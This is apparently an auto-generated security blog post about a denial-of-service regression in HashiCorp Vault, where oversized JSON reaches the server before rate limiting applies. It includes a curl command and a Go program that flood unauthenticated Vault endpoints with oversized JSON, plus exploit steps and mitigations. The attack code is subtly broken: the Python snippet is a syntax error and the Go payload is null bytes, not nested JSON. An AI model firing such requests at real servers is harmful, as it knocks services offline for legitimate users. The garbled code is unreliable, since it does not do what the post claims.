Listen to this Post
This vulnerability is a regression of a previously patched denial-of-service issue. In the affected versions, a flaw in the HTTP request handling pipeline allows an unauthenticated attacker to send a malicious JSON payload before the API rate limiting middleware processes the request. This enables the request to bypass intended rate limits. The vulnerable Vault instance then processes this complex JSON payload, which can be crafted to be deeply nested or otherwise computationally expensive to parse. This excessive consumption of CPU resources, without being throttled by rate limits, leads to a denial-of-service condition, rendering the Vault service unresponsive to legitimate user requests. The issue is fixed by re-ordering the middleware to ensure rate limits are applied before JSON parsing occurs.
Platform: Hashicorp Vault
Version: >=1.20.3,<1.21.0
Vulnerability : DoS
Severity: High
date: 2025-10-23
Prediction: 2025-11-06
What Undercode Say:
curl -X POST http://vault-host:8200/v1/sys/init \
-H "Content-Type: application/json" \
-d '{"malicious_json": "'$(python3 -c "print('[' 10000 + ']' 10000)")'"}'
package main
import (
"bytes"
"net/http"
)
func main() {
jsonData := `{"a":` + string(make([]byte, 1000000)) + `}`
http.Post("http://vault-host:8200/v1/auth/token/lookup-self", "application/json", bytes.NewBufferString(jsonData))
}
How Exploit:
Craft oversized JSON.
Send unauthenticated requests.
Bypass rate limiting.
Exhaust CPU resources.
Protection from this CVE
Upgrade to 1.21.0.
Apply middleware ordering fix.
Implement WAF rules.
Use network ACLs.
Impact:
Service unavailability.
CPU exhaustion.
Bypassed rate limits.
Unauthenticated attacks.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

